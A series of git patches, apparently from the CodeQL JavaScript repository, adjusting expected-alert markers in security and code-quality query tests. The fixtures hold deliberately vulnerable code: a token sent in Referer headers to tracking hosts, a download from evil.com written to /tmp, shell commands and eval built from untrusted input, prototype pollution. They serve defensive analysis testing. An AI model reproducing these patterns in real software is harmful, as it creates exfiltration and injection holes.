b/javascript/ql/test/query-tests/Security/CWE-200/sentAsHeaders.js @@ -15,14 +15,14 @@ try { hostname: "sstatic1.histats.com", path: "/0.gif?4103075&101", method: "GET", - headers: { Referer: "http://1.a/" + content } // $ Alert - passing stolen token in a header - }, () => { }) + headers: { Referer: "http://1.a/" + content } // passing stolen token in a header + }, () => { }) // $ Alert[js/file-access-to-http] https1.get({ hostname: "c.statcounter.com", path: "/11760461/0/7b5b9d71/1/", method: "GET", - headers: { Referer: "http://2.b/" + content } // $ Alert - passing stolen token in a header - }, () => { }) + headers: { Referer: "http://2.b/" + content } // passing stolen token in a header + }, () => { }) // $ Alert[js/file-access-to-http] }); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js b/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js index ec2e40a7c2b3..b6243e115f1c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/subfolder/private-file-exposure-2.js @@ -3,4 +3,4 @@ var http = require('http') var app = express() var server = http.createServer(app) // Static files: -app.use(express.static(__dirname)) +app.use(express.static(__dirname)) // $ Alert[js/exposure-of-private-files] diff --git a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js index 63aa2666c69d..016e89c00a9b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js +++ b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js @@ -1 +1 @@ -window.parent.postMessage(userName, '*'); +window.parent.postMessage(userName, '*'); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js index 6a38d5a02a27..112f308499c3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js +++ b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js @@ -10,4 +10,4 @@ window.parent.postMessage(password, '*'); // $ Alert window.parent.postMessage(data.bar, '*'); })(); -window.parent.postMessage(authKey, '*'); +window.parent.postMessage(authKey, '*'); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-295/tst2.js b/javascript/ql/test/query-tests/Security/CWE-295/tst2.js index 50f5ae277146..f36ccfbc0990 100644 --- a/javascript/ql/test/query-tests/Security/CWE-295/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-295/tst2.js @@ -5,7 +5,7 @@ let requestOptions = { "content-type": "application/json", "accept": "application/json" }, - rejectUnauthorized: false, + rejectUnauthorized: false, // $ Alert requestCert: true, agent: false } diff --git a/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js b/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js index 92ecbb49e58d..9d7648df8e33 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js @@ -1,9 +1,9 @@ const webpack = require("webpack"); -var plugin = new webpack.DefinePlugin({ // $ Alert +var plugin = new webpack.DefinePlugin({ "process.env": JSON.stringify(process.env) -}); +}); // $ Alert[js/build-artifact-leak] new webpack.DefinePlugin({ 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG }) }) diff --git a/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js b/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js index b7d99c2c9eec..4c2e13deaa64 100644 --- a/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js +++ b/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js @@ -12,5 +12,5 @@ var actions = { app.get('/perform/:action/:payload', function(req, res) { let action = actions[req.params.action]; - res.end(action(req.params.payload)); + res.end(action(req.params.payload)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js b/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js index 3fd3780bf860..8d89560e51f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js +++ b/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js @@ -5,7 +5,7 @@ app.get('/:path', function(req, res) { let path = req.params.path; if (isValidPath(path)) res.sendFile(path); -}); +}); // $ Alert function f1(req, res) { let path = req.params.path; @@ -22,4 +22,4 @@ function f3(req, res) { res.sendFile(path); } -app.get('/:path', f1, f2, f3); +app.get('/:path', f1, f2, f3); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js index 77645d0f3ac4..2a7c5d2f7b87 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js @@ -3,6 +3,6 @@ var fs = require("fs"); https.get('https://evil.com/script', res => { res.on("data", d => { - fs.writeFileSync("/tmp/script", d) + fs.writeFileSync("/tmp/script", d) // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index ad420927a5c4..95bc34a79cf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index 8111eb36d94a..8f6ded8b2a91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -8,13 +8,13 @@ app.get('/hello', function(req, res) { _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // $ Alert - }); + value: req.query.value + }); // $ Alert let opts = { thing: req.query.value // wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // $ Alert - }); + value: opts.thing + }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js index ea1966d190b7..5ff77f4e77bc 100644 --- a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js +++ b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js @@ -2,7 +2,7 @@ function bad1() { if (cond1()) if (cond2()) return 23; - else + else // $ Alert return 42; } @@ -18,7 +18,7 @@ function bad2() { if (cond1()) { if (cond2()) { return 23; - } else { + } else { // $ Alert return 42; }} } @@ -37,7 +37,7 @@ function bad3() { else if (cond2()) if (cond2()) return 42; - else + else // $ Alert return 42; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js index 914229480a18..2b9be9c5874b 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js @@ -1,5 +1,5 @@ function f() { if (someCond()) - return; + return; // $ Alert return 42; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js b/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js index 7eb15c1006ae..a06361e01438 100644 --- a/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js +++ b/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js @@ -1,7 +1,7 @@ switch (a) { case 0: case 1: - case2: + case2: // $ Alert f(); break; default: diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html index f039917e0c73..c01acb8a6b32 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html @@ -4,7 +4,7 @@ diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js index 11cc92b5b27a..f23767bfe19a 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js @@ -1,7 +1,7 @@ function bad1() { if (cond()) f(); - g(); + g(); // $ Alert } function good1() { @@ -22,7 +22,7 @@ function bad2() { f(); else g(); - h(); + h(); // $ Alert } function good3() { @@ -34,7 +34,7 @@ function good3() { function wbad1() { while (cond()) f(); - g(); + g(); // $ Alert } function wgood1() { diff --git a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html index 6176fc9a39f1..7d80dd84642e 100644 --- a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html +++ b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html @@ -6,7 +6,7 @@ - +
    diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js index ba28c486ce31..6deedccfd340 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js @@ -146,4 +146,4 @@ for (const [key, key2, key3, value] of array) { } for (const [key, key2, key3, value] of array) {} // $ Alert -for (let i of [1, 2]) {} \ No newline at end of file +for (let i of [1, 2]) {} // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js index 446e51ede1e4..a0a7ddf33416 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js @@ -2,7 +2,7 @@ function f() { return 23; - var a = 42; + var a = 42; // $ Alert } function g(x) { @@ -35,7 +35,7 @@ function k() { } throw new Error(); -f(); +f(); // $ Alert function l(x) { switch(x) { @@ -60,7 +60,7 @@ function m(x) { if (true) x; else - y; + y; // $ Alert function f(){ if (x) { diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js index 53496ce2e4ef..cf0c23603e2a 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js @@ -5,7 +5,7 @@ function findValue(values, x, start, end) { return i; } } - if (i < end) { + if (i < end) { // $ Alert return i; } return -1; diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js index 4cc1fd775a43..58b9232cc161 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js @@ -5,6 +5,6 @@ }); (function(){ - (function (i) { if (i == 100000) return; })(1); - (function f(i) { if (i == 100000) return; f(i+1); })(1); + (function (i) { if (i == 100000) return; })(1); // $ Alert + (function f(i) { if (i == 100000) return; f(i+1); })(1); // $ Alert }); diff --git a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js index 5741191d62d3..fef5cb07408f 100644 --- a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js +++ b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js @@ -1,3 +1,3 @@ { "x": 42 -} \ No newline at end of file +} // $ Alert \ No newline at end of file From 07a876b4e94fb7d820ca5061ce085674e1b7d316 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:20:27 +0100 Subject: [PATCH 056/892] JS: Accept some alerts at the SystemCommandExecution location --- .../CWE-078/UnsafeShellCommandConstruction/lib/lib.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index d932fbfe113e..3a5f05fac77e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -424,8 +424,8 @@ module.exports.shellOption = function (name) { spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; arr.push(name); // $ Alert - spawn("rm", arr, SPAWN_OPT); - spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. + spawn("rm", arr, SPAWN_OPT); // $ Alert + spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // $ Alert } function build(first, last) { From f3956518072e720a25a81a8db6f9c625bd397fe0 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:38:03 +0100 Subject: [PATCH 057/892] JS: Mark alert as MISSING See https://github.com/github/codeql-javascript-team/issues/447 --- .../query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index 739ec2a912be..667bbe822140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -30,7 +30,7 @@ app.get('/user/:id', function(req, res) { ['Name', 'Content'], ['body', req.body] ]); - res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps + res.send(mytable); // $ MISSING: Alert - the 'markdown-table' model needs to be converted to a flow summary }); var showdown = require('showdown'); From 1f3c49638bdc35d769fb88b77fe6fc29f3f2b716 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 14:12:04 +0100 Subject: [PATCH 058/892] JS: Accept some less obvious alerts These are listed in a function called 'good' but it's difficult to say in isolation whether they should be flagged or not. Accepting the changes as they seem reasonable. --- .../Security/CWE-116/IncompleteSanitization/tst.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index e18b45880bd3..8b7852f68535 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -126,18 +126,18 @@ function good11(s) { return s.replace("%d", "42"); } -function good12(s) { +function goodOrBad12(s) { s.replace('[', '').replace(']', ''); s.replace('(', '').replace(')', ''); s.replace('{', '').replace('}', ''); - s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer + s.replace('<', '').replace('>', ''); // $ Alert[js/incomplete-sanitization] - s.replace('[', '\\[').replace(']', '\\]'); - s.replace('{', '\\{').replace('}', '\\}'); + s.replace('[', '\\[').replace(']', '\\]'); // $ Alert[js/incomplete-sanitization] + s.replace('{', '\\{').replace('}', '\\}'); // $ Alert[js/incomplete-sanitization] s = s.replace('[', ''); s = s.replace(']', ''); - s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended + s.replace(/{/, '').replace(/}/, ''); // $ Alert[js/incomplete-sanitization] - should have used a string literal if a single replacement was intended s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged } From 68fae9ded8b84970c2a13f74a3bdcab368dedcdf Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 14:12:38 +0100 Subject: [PATCH 059/892] JS: Accept alerts about newline replacement --- .../Security/CWE-116/IncompleteSanitization/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index 8b7852f68535..ff90b5dcd234 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -145,8 +145,8 @@ function newlines(s) { // motivation for whitelist require("child_process").execSync("which emacs").toString().replace("\n", ""); - x.replace("\n", "").replace(x, y); - x.replace(x, y).replace("\n", ""); + x.replace("\n", "").replace(x, y); // $ Alert[js/incomplete-sanitization] + x.replace(x, y).replace("\n", ""); // $ Alert[js/incomplete-sanitization] } app.get('/some/path', function(req, res) { From e5bee19b1951c6866727f9a4bd3d289d62036411 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 14:16:07 +0100 Subject: [PATCH 060/892] JS: Accept a double-flagged line This is flagged by two queries but for two separate issues. Seems valid to flag it twice. --- .../query-tests/Security/CWE-116/IncompleteSanitization/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index ff90b5dcd234..d89b37f31d69 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -338,7 +338,7 @@ function typicalBadHtmlSanitizers(s) { } function bad18NewRegExp(p) { - return p.replace(new RegExp("\\.\\./"), ""); + return p.replace(new RegExp("\\.\\./"), ""); // $ Alert[js/incomplete-sanitization] Alert[js/incomplete-multi-character-sanitization] -- both lacking global flag, and multi-char replacement problem } function bad4NewRegExpG(s) { From e026b9e04893c06e448d49e86eb33f94aa7abd21 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:12:16 +0100 Subject: [PATCH 061/892] JS: Mark regressions due to lack of local field steps --- .../UnsafeShellCommandConstruction/lib/lib.js | 4 ++-- .../CWE-079/UnsafeHtmlConstruction/main.js | 2 +- .../CWE-094/CodeInjection/lib/index.js | 18 +++++++++--------- .../PrototypePollutingAssignment/lib.js | 2 +- 4 files changed, 13 insertions(+), 13 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 3a5f05fac77e..b6efdbd131a6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -363,8 +363,8 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // $ Alert - cp.exec(command); + var command = "learn " + this.learn_args + " " + model; // $ MISSING: Alert - lack of local field step + cp.exec(command); } }; module.exports.MyTrainer = MyTrainer; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 369643121368..061a82c862d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // $ Alert + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ MISSING: Alert - needs localFieldStep } } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 950d34ff981f..600059382d9d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // $ Alert + eval(" var " + opts.varName + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { @@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert - eval(" var " + this.taint + " = something();"); // $ Alert + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } @@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert - eval(" var " + this.taint + " = something();"); // $ Alert + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index 6acf7ef2df10..79b34df3f7b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -67,7 +67,7 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // $ Alert + return (obj[path[0]][path[1]] = value); // $ MISSING: Alert - lacking local field step } safe() { From 2c46e106787f570188d38046431321b1e6f9ff06 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:23:37 +0100 Subject: [PATCH 062/892] JS: Mark an alert as missing --- .../test/query-tests/Security/CWE-200/private-file-exposure.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js index c3aaec3926ff..ba532d6b42e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js @@ -61,7 +61,7 @@ function good() { app.use("bootstrap", express.static('./node_modules/bootstrap/dist')); } -app.use(express.static(__dirname)) // $ Alert +app.use(express.static(__dirname)) // $ MISSING: Alert const serveHandler = require("serve-handler"); const http = require("http"); From 426a871405c82a1edbf9d51fb5a0b70fb97c2cd7 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 15:11:58 +0100 Subject: [PATCH 063/892] JS: Remove incorrect Alert marker This is expected, based on a comment earlier in the file about the 'y' variable --- .../ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index 1e53a3a4a0f0..29eb66403511 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -3,6 +3,6 @@ /*global: z*/ // also not a proper global declaration w; x; -y; // $ Alert +y; z; // $ Alert var x, y, z; \ No newline at end of file From 287753187eadb95ca9047e4641ab33562f42f699 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 15:24:16 +0100 Subject: [PATCH 064/892] JS: Remove invalid syntax from test TS decorators may not appear on functions and enums --- .../UnusedVariable/UnusedVariable.expected | 2 -- .../Declarations/UnusedVariable/decorated.ts | 12 +++--------- 2 files changed, 3 insertions(+), 11 deletions(-) diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected index 52ffe782fa2b..6b77c8021fbc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected @@ -1,7 +1,5 @@ #select | Babelrc/importPragma.jsx:2:1:2:27 | import ... react'; | Unused import q. | -| decorated.ts:1:1:1:126 | import ... where'; | Unused import actionHandler. | -| decorated.ts:4:10:4:12 | fun | Unused function fun. | | eval.js:10:9:10:24 | not_used_by_eval | Unused variable not_used_by_eval. | | eval.js:19:9:19:24 | not_used_by_eval | Unused variable not_used_by_eval. | | externs.js:5:5:5:13 | iAmUnused | Unused variable iAmUnused. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts index 858f69ffd5b1..39a06d5eb293 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts @@ -1,13 +1,7 @@ -import {actionHandler, actionHandlerFactory, actionHandlerFactoryProvider, actionHandlerFactoryProviderKind} from 'somewhere'; // OK - imports used as decorators - -@actionHandler -function fun() {} // OK - decorator might use the function +import { actionHandlerFactory, actionHandlerFactoryProvider } from 'somewhere'; // OK - imports used as decorators @actionHandlerFactory -class Class {} // OK - decorator might use the class +class Class { } // OK - decorator might use the class @actionHandlerFactoryProvider -export class ExportedClass {} // OK - decorator might use the class - -@actionHandlerFactoryProviderKind -enum Enum { plain } // OK - decorator might use the enum +export class ExportedClass { } // OK - decorator might use the class From a9b263f465d50279805ff6a8d5df7494ea0da543 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 16:01:58 +0100 Subject: [PATCH 065/892] JS: Remove incorrect alert expectation This is not flagged and AFAICT it shouldn't be --- .../Expressions/UnknownDirective/UnknownDirective.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index f958714431d6..e86b7b9d95bc 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js @@ -1,5 +1,5 @@ "use foo"; // $ Alert -"use strict"; // $ Alert +"use strict"; function bad() { "'use strict'"; // $ Alert From 22c218d66586d01b07a03b6934c26d4a9ee3b702 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 16:20:39 +0100 Subject: [PATCH 066/892] JS: Mark a 'good' test as 'bad' and add Alert marker The lack of whitespace around '&&' is problematic --- .../Expressions/WhitespaceContradictsPrecedence/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index a18728b19dc0..30b75270f946 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -38,8 +38,8 @@ function ok9(x, y, z) { return x * y*z; } -function ok10(o, p) { - return p in o&&o[p]; +function bad10(o, p) { + return p in o&&o[p]; // $ Alert } From b095fe2a19875508583ee2229e6ec72efd07c649 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 09:51:03 +0100 Subject: [PATCH 067/892] JS: Fix some bugs in a test case 'args' was a redeclared block-level variable, and 'myArgs' was not used when clearly intended to be used --- .../CWE-078/CommandInjection/child_process-test.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index 